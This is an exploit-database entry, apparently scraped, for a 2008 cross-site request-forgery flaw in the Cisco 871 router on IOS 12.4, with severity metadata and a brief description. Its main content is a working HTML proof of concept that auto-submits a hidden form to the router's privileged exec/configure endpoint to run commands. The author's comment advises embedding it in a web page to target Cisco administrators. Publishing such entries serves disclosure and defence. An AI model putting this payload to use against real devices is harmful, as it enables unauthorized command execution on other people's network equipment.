Cisco 871 Integrated Services Router Cross-Site Request-Forgery Vulnerability

vendor:

871 Integrated Services Router

by:

Jeremy Brown

7.5

CVSS

HIGH

Cross-Site Request-Forgery

352

CWE

Product Name: 871 Integrated Services Router

Affected Version From: IOS 12.4

Affected Version To: IOS 12.4

Patch Exists: YES

Related CWE: N/A

CPE: cisco:871_integrated_services_router

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Cisco 871 Integrated Services Router Cross-Site Request-Forgery Vulnerability

The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.

Mitigation:

Ensure that all web applications are patched and updated to the latest version.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31218/info
 
The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.
 
Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.
 
The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. 

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html>